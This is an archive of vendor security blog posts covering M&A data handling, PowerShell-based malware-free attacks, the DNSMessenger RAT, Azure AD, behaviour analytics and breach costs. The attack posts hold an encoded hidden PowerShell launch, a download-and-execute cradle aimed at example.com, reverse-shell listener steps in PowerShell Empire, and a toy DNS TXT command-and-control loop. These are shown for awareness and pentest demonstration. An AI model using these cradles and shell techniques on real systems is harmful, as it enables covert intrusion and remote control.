Category Archives: IT Pros

12 Ways Varonis Helps You Manage Mergers and Acquisitions

How Varonis Helps with Mergers and Acquisitions

A well-constructed Merger & Acquisition (M&A) playbook reduces the overall time, cost, and risk of an upcoming merger or acquisition. Gartner advises that organizations that intend to grow through acquisitions involve the CIO and IT teams early in the process by “sharing models with their business executives that raise the right questions and issues to consider.” Further, according to Gartner analysts Cathleen E. Blanton and Lee Weldon, CIOs should “create a reusable IT M&A playbook that can be quickly deployed when an idea or opportunity arises” and share it with senior management.

One of the key challenges with any merger and acquisition is how to protect, classify, manage, and migrate unstructured data throughout the entire process. Varonis not only helps protect M&A data before, during, and after the announcement, but also helps organizations with each stage along the way: Due Diligence, Integration, and Realization.

With Varonis, organizations can:

  • Assess risk and catalog resources during due diligence
  • Gain insight into security practices and procedures of the target organization
  • Discover domains and user accounts to prepare for integration into the new organization
  • Classify sensitive data in acquired data storage
  • Help create an audit strategy for inherited unstructured data
  • Migrate data to consolidated storage during integration
  • Eliminate the potential for service interruptions to critical data

“CIOs in organizations that plan to grow through mergers and acquisitions must help executives appreciate how technology, data, and analytic capabilities support operational and strategic objectives. A few simple models can make the difference between M&A success and failure.”

-Cathleen E. Blanton and Lee Weldon, Gartner Inc.

Due Diligence

Due diligence is the phase of M&A where decision makers weigh the pros and cons of moving forward with the acquisition, and, according to Gartner, it is the phase that underutilizes IT resources the most.

Asking important questions like “is there a danger of a security breach disrupting our M&A?” or “is the acquisition target providing all of the information, or hiding some important detail?” – and having the data to answer those questions – is vital to the decision-making process.

50-70% of any organization's data lives in unstructured repositories. This data can be either a goldmine or a landmine for a successful M&A. Varonis helps you determine which of the two you're getting.

“CIOs and their teams can quickly grasp and highlight the severity of lax security and the consequent risk to operations.”

-Cathleen E. Blanton and Lee Weldon, Gartner Inc.

Sensitive Content Discovery

Varonis Data Classification Engine classifies sensitive data in unstructured repositories, including email, cloud storage, and NAS devices. You will be able to assess whether the acquisition target adequately manages its sensitive data, identify current security vulnerabilities, discover critical data that needs to be locked down, and determine whether the target is vulnerable to – or in some cases has already experienced – a major data breach.

Domain and User Discovery

Varonis DatAdvantage analyzes and gathers data about each domain and every user account in the acquisition target. Varonis automatically identifies executive, service, and privileged accounts – and helps prepare existing account management for the upcoming merger or acquisition. With this data, you can determine if the company has policies in place to manage and monitor user accounts and identify stale accounts that a hacker could use to steal data.

File System Discovery

Varonis DatAdvantage crawls the folder structure of data repositories, including all permissions on each folder. Is the company using least privilege permissions or global access groups? Does everyone have full read/write access on all folders?

With Varonis, you can instantly visualize or report on potential access for any user or group in Active Directory, Azure AD, or a local system; pinpoint over-exposed sensitive data; and identify excessive permissions.
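
To make the global-access question concrete: below is a rough, minimal PowerShell sketch that flags folders open to the well-known global groups. The share path is a placeholder, and this is a manual spot-check only; Varonis automates this analysis at scale, and a crawl like this quickly becomes impractical on a large file system.

    # Spot-check a share for folders exposed to global access groups
    # ('\\fileserver\share' is a placeholder -- point it at a real share)
    Get-ChildItem -Path '\\fileserver\share' -Directory -Recurse |
        ForEach-Object {
            $acl = Get-Acl -Path $_.FullName
            # Flag ACL entries granted to the usual "everyone" suspects
            $open = $acl.Access | Where-Object {
                $_.IdentityReference -match 'Everyone|Authenticated Users|Domain Users'
            }
            if ($open) {
                [pscustomobject]@{
                    Folder = $_.FullName
                    OpenTo = ($open.IdentityReference -join ', ')
                }
            }
        }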

Assess Risk

Varonis DatAlert has built-in risk dashboards that give teams insight into what data is at risk, identify potentially suspicious user behavior, and track remediation efforts. You will be able to assess whether there is a risk of an undisclosed data breach in the acquisition target.

It can be a career-ending mistake to move forward with an acquisition only to later discover a massive data breach in the acquired company’s data. Not to mention a potential loss of expected revenue that drove the acquisition in the first place.

Additionally, you’ll get a good idea of the amount of work required to integrate the acquired domains and file systems while analyzing the data from the Varonis discovery process. You will be able to provide a more accurate estimate of the amount of time before you reach value realization, which also influences decisions made during due diligence.

Reports

Varonis has several out-of-the-box reports that can be distributed to the M&A team and analyzed during the due diligence process. These reports will provide a clear picture of the unstructured data and security practices of the acquisition target. CIOs and IT teams can use data from Varonis to empower the M&A team to make the best decision during the due diligence phase for their organization.

Integration

Merging two companies' IT infrastructures is not trivial. Throughout the process, you must be aware of possible security threats – both internal and external. There's no rewinding the clock at this point: the deal is done, and the IT systems need to be consolidated and protected in order for the new organization to thrive.

A successful integration phase will be free of service disruptions and move quickly into the value realization phase of M&A.

Varonis provides key functionality you will use throughout the Integration process that will both speed up the integration and provide visibility to all stakeholders.

Domain Consolidation

The first and most immediate challenge in integration is “how do we get all of the users using the same systems with the correct permissions?”

Merging one or more domains into a single primary entity is very difficult with the basic toolset. Varonis DatAdvantage provides a single pane of glass into all domains, users, and groups, streamlining the process while taking steps to preserve the integrity of permissions and data access.

DatAdvantage gives a clear picture of the current domain setup, so that the team can mirror the existing users and groups in the primary domain. Varonis provides a complete audit trail of the changes made, including the IT staff person who made the change. Reports on users and groups can help the M&A team verify that each user has the correct permissions in the new organization.

These reports also highlight potential problems in the domain configuration that could lead to data breaches, interrupted service, or data leaks – like orphaned or nested groups. That domain data will be refreshed and available for audit in DatAdvantage so that any issues created one day are resolved the next.

Folder Permissions

Nothing limits productivity like not having access to the resources you need to do your job. Varonis optimizes the process of changing and updating share and folder permissions. With the single-pane-of-glass view discussed above to consolidate the domains, you can view and modify folder permissions with a complete audit trail. You can easily add acquired users to the ACLs of existing resources, which keeps them productive throughout the integration.

Varonis DataPrivilege enables data owners to manage access directly, and makes the process for users to request access to data even easier. With DataPrivilege, new users request folder access from a simple interface, and the data owners review and approve or deny the request, taking the burden of user access management off of IT.

The Varonis Automation Engine addresses the broken-permissions issues that can occur when this much change is introduced into your company's data. The Automation Engine makes it easy to revoke unnecessary access that users no longer need or use, keeping your data safe. Automatically fix inconsistent ACLs on a folder, a hierarchy, or even an entire server – and eliminate inconsistent file permissions.

Data Migration and Storage Consolidation

Most merger and acquisition processes require a significant amount of data migration and storage consolidation, along with decisions about which of the newly acquired – and expensive – storage devices you actually need.

The Varonis Data Transport Engine automates and simplifies large data migrations. Using the Data Transport Engine, you can move data from one storage server to another to save money and reduce overhead while maintaining or updating file access permissions.

The Data Transport Engine mirrors the existing permissions on the new storage using the information it already discovered from crawling the file structure, and can update permissions to achieve least privilege. The ability to consolidate storage systems can result in tens of thousands of dollars in savings to the new company moving forward. Data Transport Engine streamlines the process while maintaining least privilege permissions and protecting your data.

Lock Down Sensitive Data

The Varonis Data Classification Engine continues to scan acquired data for sensitive files throughout the due diligence and integration phases. As you discover new sensitive data you can use Varonis to help manage the files, folders, and subsequent permissions to keep the data safe, making sure that only the right people have access to the right data. You can also use the Data Transport Engine to move the files to quarantine.

Value Realization

Once due diligence and integration are complete, organizations need to practice data-centric security in order to maintain the security and integrity of the data post-merger, and to be ready for potential future M&As.

Data Discovery and Classification

The Varonis Data Classification Engine has a wide array of built-in compliance packs for regulations such as GDPR, HIPAA, SOX, PCI-DSS, etc., while providing the ability to create custom rules, perform algorithmic verification, add manual flags, and even automatically quarantine or delete sensitive content that is out-of-policy.

Permissions Management

Varonis helps manage permissions and data access as a company grows, simplifying the permission structure on all platforms and revoking unnecessary permissions without affecting end users by simulating permission changes before applying new permissions.

Security Analytics

Varonis continuously monitors and analyzes user activity and behavior across hybrid environments and builds behavioral baselines for every account. Security teams can analyze data access events in context with data sensitivity, permissions, and Active Directory metadata, resulting in accurate alerts and fewer false positives.

With over 100 threat models, Varonis alerts on everything from unusual mailbox activity to insider threats to known malware behavior. Security teams have the flexibility to use the DatAlert dashboard or send alerts to an integrated SIEM.

Curious to see how Varonis can help with your M&A playbook? Get a customized demo and we’ll show you.

Adventures in Malware-Free Hacking, Part II

I'm a fan of the Hybrid Analysis site. It's kind of a malware zoo where you can safely observe dangerous specimens captured in the wild without getting mauled. The HA team runs the malware in safe sandboxes and records system calls, files created, and internet traffic, displaying the results for each malware sample. So you don't necessarily have to spend time puzzling over or, gulp, even running the heavily obfuscated code to understand the hackers' intentions.

The HA samples I focused on use either encasing JavaScript or Visual Basic for Applications (VBA) scripts – the "macros" embedded in Word or Excel documents attached to phish mails. These scripts then launch a PowerShell session on the victim's computer. The hackers usually send PowerShell a Base64-encoded stream. It's all very sneaky and meant to make it difficult for monitoring software to find obvious keywords to trigger on.
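
To see why the encoding defeats naive keyword matching, here's a minimal sketch of the trick itself, using a harmless placeholder payload. PowerShell expects the encoded command to be UTF-16LE before the Base64 step:

    # Encode a (harmless) command the way malicious droppers typically do
    $cmd = 'Write-Output "Evil Malware"'
    $encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($cmd))

    # The dropper then spawns something like this -- no obvious keywords to scan for
    powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand $encoded

    # Decoding recovers the plain text, which is what HA displays for you
    [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($encoded))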

Mercifully, the HA team decodes the Base64 and displays the plain text. In effect, you don't really need to focus on how these scripts work, because you'll see the command lines of the spawned processes in HA's "Process launched" section. The screenshots below illustrate this:

Hybrid Analysis captures the Base64-encoded commands sent to a PowerShell process …

… and then decodes it for you. #amazing

In the last post, I created my own mildly obfuscated JavaScript container to launch a PowerShell session.

Then my script, like a lot of PowerShell-based malware, downloads a second PowerShell script from a remote web site. To do this safely, my dudware downloads a harmless one-liner of PS that prints out a message.
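
That second-stage download is the classic one-line cradle. Here's a sketch of the idea, with a placeholder URL standing in for wherever the harmless one-liner is hosted:

    # Pull a remote PS script and run it in memory -- nothing touches disk
    IEX (New-Object System.Net.WebClient).DownloadString('http://example.com/second-stage.ps1')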

This being the IOS blog, we never, ever do anything nice and easy. Let's take my scenario a step further.

PowerShell Empire and Reverse Shells

One of the goals of this exercise is to show how (relatively) easy it is for a hacker to get around legacy perimeter defenses and scanning software. If a non-programming security blogger such as myself can cook up potent, fully undetectable (FUD) malware in a couple of afternoons (with help from lots of espressos), imagine what a smart Macedonian teenager can do!

And if you’re an IT security person who needs to convince a stubborn manager – I know they don’t exist, but let’s say you have one – that the company needs to boost its secondary defenses, my malware-free attack example might do the trick.

I’m not suggesting you actually phish management, though you could. If you take this route and use my scripts, the message that prints on their laptops would count as a cybersecurity “Boo!”.  It may be effective in your case.

But if your manager then challenges you by saying, “so what”, you can then follow up with what I’m about to show you.

Hackers want to gain direct access to the victim’s laptop or server. We’ve already reviewed how Remote Access Trojans (RATs) can be used to sneakily send and download files, issue commands, and hunt for valuable content.

However, you don’t have to go that far. It’s very easy to gain shell access, which for certain situations might be all a hacker requires – to get in and get out with a few sensitive files from the CEO’s laptop.

Remember the amazing PowerShell Empire post-exploitation environment that I wrote about?

It's a, cough, pen testing tool that, among its many features, lets you easily create a PowerShell-based reverse shell. You can learn more about this on the PSE site.

Let's take a quick walk through it. I set up my malware testing environment within my AWS infrastructure so I can work safely. And you can do the same to show management a PoC (and not get fired for running gray-area hacking software on premises).

If you bring up the main console of PowerShell Empire, you’ll see this:

First, you configure a listener on your hacking computer. Enter the "listeners" command, and follow up with "set Host" and the IP address of your system — that's the "phone home" address for the reverse shell. Then launch the listener process with an "execute" command (below). The listener forms one end of your shell connection.

For the other end, you'll need to generate agent-side code by entering the "launcher" command (below). This generates code for a PowerShell agent — note that it's Base64-encoded — and will form the second stage of the payload. In other words, my JavaScript encasing code from last time will now pull down the PowerShell launcher agent instead of the harmless code that outputs "Evil Malware", and connect back to the remote listener in reverse-shell fashion.
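
Pieced together, the console session looks roughly like this. I'm reconstructing from the steps above, so treat the prompts and the IP address as illustrative; exact command names vary between Empire versions:

    (Empire) > listeners
    (Empire: listeners) > set Host http://10.0.0.5:8080    # your "phone home" address
    (Empire: listeners) > execute                          # start the listener
    (Empire: listeners) > launcher                         # emit the Base64-encoded agent one-liner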

Reverse-shell magic. This encoded PowerShell command will connect back to the remote listener and set up a shell.

To run this experiment, I played the part of an innocent victim and clicked on Evil.doc, which is the JavaScript I set up last time. Remember? The PowerShell was configured not to pop up a window, so the victim won't notice anything unusual going on. However, if you look at the Windows Task Manager, you'll see the background PowerShell process, which may not trigger alarms 'cause it's just PowerShell, right?

Now when you click on Evil.doc, a hidden background process will connect to the PowerShell Empire listener.

Putting on my hacker-pentester hat, I returned to my PowerShell Empire console, and now see the message that my agent is active.

I then issued an interact command to pop up a shell in PSE. And I'm in! In short: I hacked into the Taco server that I set up once upon a time.

What I just described is not a lot of work. If you’re doing this for kicks during a long lunch hour or two to improve your infosec knowledge, it’s a great way to see how hackers get around border security defenses and stealthily lurk in your system.

And IT managers who believe they've built a breach-proof defense may, fingers crossed, find this enlightening – if you can convince them to sit down long enough.

Let’s Go Live

As I've been suggesting, real-world malware-free hacking is just a variation on what I just presented. To get a little preview of the next post, I searched for a Hybrid Analysis specimen that works in a similar fashion to my made-up sample. I didn't have to search very long – there's lots of this attack technique on their site.

The malware I eventually found in Hybrid Analysis is a VBA script that was embedded in a Word doc. So instead of faking the doc extension, which I did for my JavaScript example, this malware-free malware is really, truly, a Microsoft document.

If you’re playing along at home, I picked this sample, called rfq.doc.

I quickly learned you often can’t directly pull out the actual evil VBA scripts. The hackers compressed or hid them, and they won’t show up in Word’s built-in macro tools.

You’ll need a special tool to extract it. Fortunately, I stumbled upon Frank Boldewin’s OfficeMalScanner. Danke, Frank.

Using this tool, I pulled out the heavily obfuscated VBA code. It looks a little bit like this:

Obfuscation done by pros. I’m impressed!

Attackers are really good at obfuscation, and my effort in creating Evil.doc was clearly the work of a rank amateur.

Anyway, next time we'll get out our Word VBA debuggers, delve into this code a little bit, and compare our analysis to what HA came up with.

DNSMessenger: 2017’s Most Beloved Remote Access Trojan (RAT)

I've written a lot about Remote Access Trojans (RATs) over the last few years, so I didn't think there was much innovation left in this classic hacker software utility. RATs, of course, allow hackers to get shell access and issue commands to search for content and then stealthily copy files. However, I somehow missed DNSMessenger, a new RAT variant that was discovered earlier this year.

The malware runs when the victim clicks on a Word doc attached to an email – a VBA script embedded in the doc then launches some PowerShell. Nothing that unusual so far in this phishing approach.

Ultimately, the evil RAT payload is set up in another launch stage. The DNSMessenger RAT is itself a PowerShell script. The way the malware unrolls is intentionally convoluted and obfuscated to make it difficult to spot.

And what does this PowerShell-based RAT do?

RAT Logic

No one's saying that a RAT has to be all that complicated. The main processing loop accepts messages that tell the malware to execute commands and send results back.

Here’s a bit of DNSMessenger code to probe the DNS servers. The addresses are hardcoded.

The clever aspect of DNSMessenger is that — surprise, surprise — it uses DNS as the C2 server to query records from which it pulls in the commands.
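
To make the idea concrete, here's a toy PowerShell illustration of the technique (my own sketch, not DNSMessenger's actual code, and the C2 domain is a placeholder). An agent can poll TXT records for instructions using nothing but the built-in DNS client:

    # Toy C2 loop: fetch a "command" from a DNS TXT record and run it
    while ($true) {
        $txt = (Resolve-DnsName -Name 'c2.example.com' -Type TXT -ErrorAction SilentlyContinue).Strings
        if ($txt) {
            # Real malware decodes and decrypts here; the toy version just runs the text
            Invoke-Expression ($txt -join '')
        }
        Start-Sleep -Seconds 60   # poll slowly to stay under the radar
    }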

It’s a little more complicated than what I’m letting on, and if you want, you can read the original analysis done by Cisco’s Talos security group.

Stealthy RAT

As noted by security pros, DNSMessenger is effectively "file-less" since it doesn't have to save any commands from the remote server onto the victim's file system. And because it runs in PowerShell, DNSMessenger is very difficult to detect while it's running. Using PowerShell also means that virus scanners won't automatically flag the malware.

This is right out of the malware-less hacking cookbook.

Making it even more deadly is its use of the DNS protocol, which is not one of the usual protocols on which network filtering and monitoring is performed — such as HTTP or HTTPS.

A tip of the (black) hat to the hackers for coming up with this. But that doesn't mean that DNSMessenger is completely undetectable. The malware does have to access the file system as commands sent via DNS tell it to scan folders and search for monetizable content. Varonis's UBA technology would spot anomalies on the account on which DNSMessenger is running.

It would be great if it were possible to connect the unusual file-access activity to the DNS exfiltration being done by DNSMessenger. Then we'd have hard proof of an incident in progress.

Varonis Edge

We’ve recently introduced Varonis Edge, which is specifically designed to look for signs of attack at the perimeter, including VPNs, Web Security Gateways, and, yes, DNS.

As I mentioned in my last post, malware-free hacking is on the rise and we should expect to see more of it in 2018.

It would be a good exercise to experiment with and analyze a DNSMessenger-style trojan. I can't do it this month, but I'm making it my first New Year's resolution to try in January in my AWS environment.

In the meantime, try a demo of Varonis Edge to learn more.

Top Azure Active Directory Tutorials

Remember a few years ago when security pros and IT admins were afraid to store business files on the cloud? Today, the circumstances are different. I recently spoke with an engineer and he said he’s getting more questions about the cloud than ever before.

What's more, according to Microsoft, 86% of Fortune 500 companies use Microsoft cloud services – Azure, Office 365, CRM Online, etc. – all of which sit on Azure AD. So it's time we embrace the future and start learning about the differences between Windows Server Active Directory and Azure AD, Azure AD Premium, Azure AD Connect, and more.

Yes, there are already many articles and books, but sometimes it's helpful to have a human explain how things work. So this week, I scoured hours of Ignite and TechEd videos and found the best Azure AD explainers. By the way, if you're already using Office 365, you're already using Azure AD. That seemed to be the same (trick) question asked in almost every video.

Azure Active Directory, described four different ways:

This video explains Azure AD, but also provides foundational information on the challenges that led to its creation: the enormous number of apps and multitude of devices, all while maintaining all sorts of credentials and connections with your SaaS applications.

I also really liked the Cloud App Discovery feature. You're able to get a report of how many SaaS applications your users are using, which users are using them, and how much.

Azure AD Premium: If you're curious about Azure AD Premium, this video is a demo of an enterprise that had data on-prem, but started to move to cloud applications such as Office 365, Workday HR, Salesforce, and marketing applications.

Azure AD Connect: The connector is a great tool to integrate your on-premise identity system with Azure AD and Office 365.

Azure AD best practices: It's extremely helpful to learn from others – what worked, what didn't, and the circumstances under which important, fundamental security and infrastructure decisions were made.

Authentication on Azure AD: Before federation, a user had to share their username and password with any application that they wanted to act on their behalf. Users had to trust unknown applications with their credentials, had to update all their applications whenever their credentials changed, and once they provided their credentials, those applications could do whatever they wanted. See what federation protocols, libraries, and directories you'll be using to authenticate on Azure AD, and 101 ways to authenticate with Azure AD.

Defining Deviancy With User Behavior Analytics

For over 10 years, security operations centers and analysts have been trading indicators of compromise (IoCs) – signature- or threshold-based signs of intrusion or attempted intrusion – to try to keep pace with the ever-changing threat environment. It's been a losing battle.

During the same time, attackers have become ever more effective at concealing their activities. A cloaking technique known as steganography has rendered traditional signature- and threshold-based detective measures practically useless.

In response, the security industry has seen new demand for User Behavior Analytics (UBA), which looks for patterns of activity and mathematically significant deviations of user behaviors (app usage, file searching activities) from historical baselines.

I’m often asked about what makes UBA different from traditional SIEM-based approaches.

Know Thy Behavioral History

In my mind, the answer is history! You know that old saying: if you don't remember the past, you'll be condemned to repeat it? That applies to a pure SIEM-based approach that's looking at – pun intended – current events: files deleted or copied, failed logins, malware signatures, or excessive connection requests from an IP address.

Of course, you need to look at raw events, but without context, SIEM-based stats and snapshots are an unreliable signal of what's really happening. We call it a "false positive" when a SIEM system raises an alert where there's no real threat. At some point, you end up continually chasing the same false leads or, even worse, ignoring them altogether – becoming "dial-tone deaf".

How many files are too many when a user is deleting or copying? How many failed logins are unusual for that particular user? When does it become suspicious for a user to visit a rarely accessed folder?

The key decision that has to be made for any event notification is the right threshold to separate normal from abnormal.

Often there are tens, hundreds, or even thousands of applications and user access patterns, each with a unique purpose and its own set of thresholds, signatures, and alerts to configure and monitor. A brute-force approach results in rules based not on past data but on ad hoc, it-feels-right settings that generate endless reports and blinking dashboards requiring a team of people to sift out the "fake news".

This dilemma over how to set a threshold has led security researchers to a statistical approach, where thresholds are based on an analysis of real-world user behaviors.

The key difference between UBA and monitoring techniques that rely on static thresholds is that the decision to trigger is instead guided by mathematical models and statistical analysis that’s better able to spot true anomalies, ultimately reducing false positives. Some examples of behavioral alerts:

  • Alert when a user accesses data that has rarely been accessed before, at a time of day that's unusual for that user — 4 AM Sunday — and then emails it to an ISP based in Croatia
  • Alert when a user has a pattern of failed login events over time that is outside the normal behavior
  • Alert when a user copies files from another user's home directory, and then moves those files to a USB drive

A Simple UBA Example

The reason UBA is so effective is that it doesn’t depend only on signature- or static threshold-based analytics.

Let’s break this down with an example.

At Acme Inc., the security team has been asked to monitor the email activity of all of its 1,000 employees. Impossible, no?

We can understand the larger problem by focusing on just 5 users (0.5% of all users). First, we apply traditional analytics and review their email activity (below) over the course of a week.

User     Monday   Tuesday   Wednesday   Thursday   Friday
Andy         10         8          30         15       13
Molly        15        29          55         33       90
Ryan         35         6           7         15       16
Sam           2         5           4          9       15
Ivan          9         1           3          5        0

Looking at this report, you might decide to investigate the users who sent the most emails, right?

You quickly learn that Molly, who sent 90 emails on Friday, is with the marketing team and her performance is based on how many customers she emails in a day. False lead!

You then decide to take the average across all the users for each day of the week. You craft a static threshold alert for whenever a user sends more emails than the average for a given day. For the data set above, the average number of emails sent by a user on any given day is 17.

If you created an alert for any time a user sends more than 17 emails in a day, you would've received 6 alerts during this time frame. Four of these alerts would bring you right back to Molly, the queen of email.


This threshold is obviously too sensitive. You need a different strategy than a raw average for all users on a given day — the vertical column.

UBA's anomaly detection algorithms look at each user, each day, and record information about their activity. This historical information, sliced by day, time, and other dimensions, is stored in the system so that baseline statistics can be created.

Think of it as the UBA tool running the reports and figuring out the averages and standard deviations for each user, comparing each user to their peers, and over time escalating only those users and activities that 'stand out from the crowd'. UBA also recalculates averages, standard deviations, and other stats dynamically over time, so that they reflect shifts in the historical trends.

For example, here’s a possible behavioral rule: Alert when a user deviates from their baseline of normal activity when sending emails.

This could be translated more precisely as 'notify when a user is two or more standard deviations away from their mean'.


User     Monday   Tuesday   Wednesday   Thursday   Friday   Average   STDEV.S   2 SD   AVG + 2 SD
Andy         10         8          30         15       13      15.2       8.7   17.4         32.6
Molly        15        29          55         33       90      44.4      29.2   58.5        102.9
Ryan         35         6           7         15       16      15.8      11.6   23.3         39.1
Sam           2         5           4          9       15       7.0       5.1   10.3         17.3
Ivan          9         1           3          5        0       3.6       3.5    7.1         10.7
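
If you want to reproduce the table's arithmetic, here's a minimal PowerShell sketch of the rule, using the sample standard deviation (Excel's STDEV.S) and Andy's week from the table:

    # Flag a day when activity exceeds mean + 2 * sample standard deviation
    function Test-Anomaly {
        param([double[]]$History, [double]$Today)
        $mean  = ($History | Measure-Object -Average).Average
        $sumSq = ($History | ForEach-Object { [math]::Pow($_ - $mean, 2) } |
                  Measure-Object -Sum).Sum
        $sd = [math]::Sqrt($sumSq / ($History.Count - 1))   # STDEV.S
        $Today -gt ($mean + 2 * $sd)
    }

    Test-Anomaly -History 10,8,30,15,13 -Today 40   # True:  40 > 32.6
    Test-Anomaly -History 10,8,30,15,13 -Today 30   # False: 30 < 32.6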

Obviously, this is not what’s done in practice – there are better statistical tests and more revealing analysis that can be performed.

The more important point is that by looking at users or a collection of users within, say, the same Active Directory groups, UBA can more accurately find and escalate true anomalies.

I’m Mike Thompson, Commercial Sales Engineer at Varonis, and This is How I Work

In March of 2015, Mike Thompson joined the Commercial Sales Engineer (CSE) team. From then on, he has been responsible for demonstrating Varonis products to potential customers, installing and configuring the software for both evaluation and production implementations, leading customer training sessions, and making sure customers are getting value out of the Varonis solutions.

This role allows him to talk to people from different parts of the country, getting a glimpse of how companies of all shapes and sizes operate. "You become fast friends when you spend a few hours on an installation with someone," says Mike.

According to his manager Kris Keyser:

“Mike is a smart, creative engineer who’s fun to work with, is well-liked by his customers and co-workers, but takes his craft seriously. He has been a real asset to the team.”

Read on to learn more about Mike – this time, in his own words.

What would people never guess you do in your role?

CSEs already handle a lot of different things, but I suspect people would be most surprised to learn that I am a panelist on the Varonis Inside Out Security Show podcast.

How has Varonis helped you in your career development?

My time at Varonis has helped me develop my communication skills and given me a better understanding of the tech and security industries, since I work with so many different types of organizations. I already had technical skills before coming to Varonis, but now I am better equipped to apply my skills and experience at a larger scale.

What advice do you have for prospective candidates?

Organization is key! Also, do not be afraid to ask questions — we do a lot here at Varonis, and certain things can only be learned through direct experience.

What do you like most about the company?

The company culture is fantastic. Everyone works hard, but the expectations are very realistic, and there are plenty of opportunities to grow and take on new roles internally. Most important is the nitro cold brew tap that we have during the warm months. It is the best.

What’s the biggest data security problem your customers/prospects are faced with?

Many of our customers are taking a hard look at data security and they find that their existing security strategy and policies don’t necessarily reflect today’s threats.

The biggest problem is not identifying the risks, but rather formulating a plan of attack to rectify the situation and ensure data security going forward, as many of the customers I talk to already have a rough idea of their weak spots. Every aspect of this problem is complex, so many people don’t know where to start.

What certificates do you have?

I’m a wildcard. (That’s a certificate joke…)

Now for some Fun Facts on Mike!

What's your all-time favorite movie or TV show?

Mad Men is definitely my favorite TV show. I have been re-watching it lately and it’s even better the second time around. Spectacular writing, great character development, attention to historical detail, and surprisingly funny.

If you could choose any place in the world to live, where would it be and why?

Right now I have no desire to leave my home in Williamsburg, Brooklyn. It’s the ideal neighborhood for me and my wife. But one day I would like to live by the beach — maybe somewhere in California where the mountains meet the ocean.

What is the first thing you would buy if you won the lottery?

A nicer apartment!

Interested in becoming Mike’s colleague? Check out our open positions, here!

My Big Fat Data Breach Cost Post, Part III

This article is part of the series "My Big Fat Data Breach Cost Series".

How much does a data breach cost a company? If you've been following this series, you'll know that there's a huge gap between Ponemon's average cost-per-record numbers and the Verizon DBIR's (as well as other researchers'). Verizon was intentionally provocative in its $.58-per-record claim. However, Verizon's more practical (and less newsworthy) results were based on a different model that derived average record costs more in line with Ponemon's analysis.

The larger issue, as I've been preaching, is that a single average for a skewed data set – more precisely, one that follows a power law – is not the best way to understand what's going on. For a single number, the median, the value below which 50% of the data set lies, does a better job of summarizing it all.

Unfortunately, when we introduce averages based on record counts, the problem is made even worse. Long sigh.

Fake News: Ponemon vs. Verizon Controversy

In other words, there are monster breaches in the Verizon data (based on NetDiligence’s insurance claim data) at the far end of the tail that result in hundreds of millions of records — and therefore an enormous denominator in calculating the average.

I should have mentioned last time that Ponemon's dataset is based on breaches of fewer than 100,000 records. Since cyber incidents involve some hefty fixed costs for consulting and forensics, you'll inevitably get a higher average when dividing the incident cost by a smaller denominator.

In brief: Ponemon's $201 vs. Verizon's $.58 average cost per record is a made-up controversy comparing the extremes of this weird dataset.

As I showed, when we ignore record counts and use average incident costs we get better agreement between Verizon and Ponemon – about $6 million per breach.

There’s a “but”.

Since we're dealing with power laws, the single average is not a good representation. Why? So much of the sample is found at the beginning of the tail, and the median – the incident cost below which 50% of the incidents lie – is not even close to the average!

My power law fueled analysis in the last post led to my amazing 3-tiered IOS Data Incident Cost Table©. I broke the fat-tailed dataset (based on NetDiligence’s numbers) into three smaller segments — Economy, Economy Plus, and Business Class —  to derive averages that are far more representative.

My Economy Class, which is based on 50% of the sample set, has an average incident cost of $1.4 million versus the overall average of $7.6 million. That’s an enormous difference! You can think of this average cost for 50% of the incidents as something like a hybrid of median and mean — it’s related to the creepy Lorenz curve from last time.

Ponemon and Pain

Let’s get back to the real world, and take another look at Ponemon’s survey. Their analysis is based on interviews with real people working for hundreds of companies worldwide.

Ponemon then calculates a total cost that takes into account direct expenses – credit monitoring for affected customers, forensic analysis – and fuzzier indirect costs, which can include extra employee hours and potential lost business.

These indirect costs are significant: in their 2015 survey, they represented almost 40% of the total cost of a breach!

As for the 100,000-record limit, Ponemon is well aware of this issue and warns that their average breach cost number should not be applied to large breaches. For example, Target's 2014 data breach exposed the credit card numbers of over 40 million customers, for a grand total of over $8 billion based on the Ponemon average. Target's actual breach-related costs were far less.

Once you go deeper into the Ponemon reports, you'll find some incredibly useful insights.

In the 2016 survey, they note that having an incident response team in place lowers data breach costs by $16 per record; Data Loss Prevention (DLP) takes another $8 off; and data classification schemes lop off another $4.

Another interesting fact is that a large contributing factor to indirect costs is something called “churn”, which Ponemon defines as current customers who terminate their relationship as the result of loss of trust in the company after a breach.

Ponemon also estimates “diminished customer acquisition”, another indirect cost related to churn, which is the cost of lost future business because of damage to the brand.

These costs are based on Ponemon analysts reviewing internal corporate statistics and putting a “lifetime” value on a customer.

Feel the pain: Ponemon’s data on lost business.

Anyway, by comparing churn rates after a breach incident to historical averages, they can detect abnormal rates and then attribute the cost to the incident.

Ponemon consolidated the business lost to churn, additional acquisition costs, and damage to "goodwill" into a bar chart (above) divided by country. For the US, the average opportunity cost for a breach is close to $4 million.

With that in mind, it’s helpful to view the average cost per record breached as a measure of overall corporate pain.

What does that mean?

In addition to actual expenses, you can think of Ponemon’s average as also representing extra IT, legal, call center, and consultant person-days of work and emotional effort; additional attention focused in future product marketing and branding; and administrative and HR resources needed for dealing with personnel and morale issues after a breach.

All of these factors are worth considering when your organization plans its own breach response program!

Some Additional Thoughts

In our chats with security pros, attorneys, and even a small business owner who directly experienced a hacking, we learned first-hand that a breach incident is very disruptive.

It's not just the "cost of doing business", as some have argued. In recent years, we've seen several CEOs fired. More recently, with the Equifax breach, along with the C-suite leaving or "retiring", the company's very existence is being threatened through lawsuits.

There is something different about a data breach. Information on customers and executives, as well as corporate IP, can be leveraged in various creative and evil ways: identity theft, blackmail, and competitive threats.

The direct upfront costs, though significant, may not reach the $100 to $200 per record range that shows up in the press, but a cyber attack resulting in a data exposure is still an expensive incident – as we saw above, over $1 million on average for most companies.

And for the longer term, Ponemon's average cost numbers are the only measurement I know of that attempts to account for these unknowns.

It's not necessarily a bad idea to be scared by Ponemon's stats, and change your data security practices accordingly.

The Difference Between Windows Server Active Directory and Azure AD

Once upon a time, IT pros believed that the risks of a data breach and compromised credentials were high enough to delay putting data on the cloud. After all, no organization wants to be a trending headline, announcing yet another data breach to the world. But over time with improved security, wider adoption and greater confidence, tech anxiety subsides and running cloud-based applications such as Microsoft’s subscription-based service Office 365 feels like a natural next step.

Once users start using Office 365, how do they manage AD? Windows Server AD or Azure AD? How are on-premise AD and Azure AD similar, and how are they different?

In this post, I will discuss the similarities, differences, and a few things in between.

What We Know For Sure: Windows Server Active Directory

Let’s start with what we know about Active Directory Domain Services.

